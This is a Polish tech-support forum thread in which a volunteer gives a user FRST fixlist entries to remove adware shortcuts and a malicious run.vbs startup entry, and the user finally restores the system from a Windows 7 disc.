Twój_Anioł_Stróż komentarz 27 grudnia 2016 komentarz 27 grudnia 2016 Usuniemy przy okazji bezplikowe skróty: Otwórz Notatnik i wklej w nim: C:\Users\Admin (czyste)\Documents\wieszak_dinos.lnk C:\Users\Admin (czyste)\Desktop\Tile Selektor.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Westwood\Shared Internet Components\Internet Registration.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Westwood\Shared Internet Components\Uninstall Registration.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Westwood\Emperor - Battle For Dune\Emperor Auto Update.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Westwood\Emperor - Battle For Dune\Emperor ReadMe.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Westwood\Emperor - Battle For Dune\Emperor Uninstall.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Westwood\Emperor - Battle For Dune\Emperor.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tile Selektor\GTAMP.com.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tile Selektor\Tile Selektor.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tile Selektor\Uninstall.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RegSeeker\License.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RegSeeker\Order.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RegSeeker\RegSeeker.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RegSeeker\Uninstall.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RegSeeker\Website.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OCCT\Ocbase.com.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OCCT\OCCT.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OCCT\Uninstall.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ivo\Ivona_Rehab-1.0\Licencja.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ivo\Ivona_Rehab-1.0\Tester syntezatorów mowy SAPI.lnk RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\wanttoxiameng C:\Users\laska\Documents\Corel\CorelDRAW X6 Samples\target.lnk S3 dtldrvhelp; \??\c:\program files\safiplayer\dtldrvhelp64.sys [X] C:\Users\laska\AppData\Local\UCBrowser C:\Users\laska\AppData\Roaming\Reorch Plik zapisz pod nazwą fixlist.txt i umieść obok FRST.exe Uruchom FRST i kliknij przycisk Fix (NAPRAW). Potem kończymy: Otwórz Notatnik i wklej w nim: DeleteQuarantine: Plik zapisz pod nazwą fixlist.txt i umieść obok FRST. Uruchom FRST i kliknij w Fix (NAPRAW). przez SHIFT+DEL usuń pozostały folder C:\FRST. . 1
volf13 komentarz 27 grudnia 2016 Autor komentarz 27 grudnia 2016 Super, dzięki bardzo! Jak mogę dać plusa?
volf13 komentarz 29 grudnia 2016 Autor komentarz 29 grudnia 2016 Ot, jednak komputer uległ poważniejszej awarii Chyba Waher się modlił do pogańskiego boga wirusów. Został jakiś chiński wyszukiwacz w przeglądarce to go przeskanowałem malwarebytes, wykryto kilkanaście zgrożeń które usunąłem. Teraz problem kwalifikuje się chyba pod awarie komputera. Przy starcie nawet w trybie awaryjnym wywala błąd: Windows Script Host skrypt: C:\Windows\run.vbs wiersz: 15 znak: 2 błąd: nie można czekać na proces kod:8020009 źródło: WshShell.Run No i pozostaje typowa tapeta trybu awaryjnego lub czarne tło przy normalnym. Nie chciał bym formatować komputera jedynie jakoś to zafiksować. Pozdrawiam!
Twój_Anioł_Stróż komentarz 29 grudnia 2016 komentarz 29 grudnia 2016 Otwórz Notatnik i wklej w nim: HKLM\...\Winlogon: [Userinit] wscript C:\Windows\run.vbs, HKLM-x32\...\Winlogon: [Userinit] wscript C:\Windows\run.vbs, [X] HKU\S-1-5-21-577603492-3380774668-2593261613-1000\...\Run: [] => [X] C:\Windows\run.vbs, EmptyTemp: Plik zapisz pod nazwą fixlist.txt i umieść obok FRST.exe Uruchom FRST i kliknij przycisk Fix (NAPRAW).
volf13 komentarz 29 grudnia 2016 Autor komentarz 29 grudnia 2016 (edytowane) Nie mam takiej możliwości. Ani start ani ikony się nie ładują, jedynie myszka działa. Komputer to taka "roślina"
Twój_Anioł_Stróż komentarz 29 grudnia 2016 komentarz 29 grudnia 2016 skoro nic już nie działa, to pozostaje tylko sformatować dysk i wgrać System od nowa. Szkoda.
volf13 komentarz 29 grudnia 2016 Autor komentarz 29 grudnia 2016 A można w jakiś sposób odzyskać zawartość dysku?
Twój_Anioł_Stróż komentarz 29 grudnia 2016 komentarz 29 grudnia 2016 (edytowane) Można by było zrobić zwykle "Przywracanie Systemu" gdyby w Trybie Awaryjnym można się było dostać do Panelu Sterowania, (lub gdyby dało się uruchomić FRST na WIN7 to nie zadziała). .
volf13 komentarz 29 grudnia 2016 Autor komentarz 29 grudnia 2016 (edytowane) Hmm znalazłem krążek do win7, boot z krążka wchodzi. Wykonałem przywracanie systemu. Nic się nie ładuje, ale błąd już nie wyskakuje. Daje też radę odpalić manager zadań. Zaraz spróbuję odpalić naprawe z krążka. EDIT: Komputer działa! Przywracanie do innego momentu go naprawiło
Twój_Anioł_Stróż komentarz 29 grudnia 2016 komentarz 29 grudnia 2016 Widzę, że sam lepiej dajesz sobie radę, niż ja. Brawo!
Wciąż szukasz rozwiązania problemu? Napisz teraz na forum!
Możesz zadać pytanie bez konieczności rejestracji - wystarczy, że wypełnisz formularz.